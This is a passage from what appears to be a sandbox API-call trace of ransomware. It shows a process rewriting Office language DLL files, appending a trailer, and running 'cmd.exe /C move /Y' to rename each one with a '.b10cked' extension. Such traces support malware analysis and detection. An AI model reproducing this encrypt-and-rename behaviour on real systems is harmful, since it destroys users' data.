nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.890] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0169.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0169.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0169.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x43560 [0169.899] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0169.899] CloseHandle (hObject=0x114) returned 1 [0169.902] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX") returned 0x3c [0169.903] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0169.903] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x9cc, dwThreadId=0x9c0)) returned 1 [0171.970] CloseHandle (hObject=0x1b4) returned 1 [0171.971] CloseHandle (hObject=0x114) returned 1 [0171.971] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0171.971] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0171.971] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22876106697) returned 1 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1a078 [0171.974] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1a560 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0171.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1a560 [0171.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0171.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0171.980] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd2af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd2af, lpOverlapped=0x0) returned 1 [0172.043] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.043] WriteFile (in: hFile=0x114, lpBuffer=0x125a4a8*, nNumberOfBytesToWrite=0xd2af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a4a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd2af, lpOverlapped=0x0) returned 1 [0172.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd2b1 [0172.044] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd2af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd2af, lpOverlapped=0x0) returned 1 [0172.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd2b1 [0172.045] WriteFile (in: hFile=0x114, lpBuffer=0x125a4a8*, nNumberOfBytesToWrite=0xd2af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a4a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd2af, lpOverlapped=0x0) returned 1 [0172.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0172.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0172.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1a560 [0172.051] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.051] CloseHandle (hObject=0x114) returned 1 [0172.052] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX") returned 0x3c [0172.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.054] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa7c, dwThreadId=0x858)) returned 1 [0172.059] CloseHandle (hObject=0x1b4) returned 1 [0172.059] CloseHandle (hObject=0x114) returned 1 [0172.059] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.059] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.060] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.060] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22884954659) returned 1 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x87a78 [0172.062] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 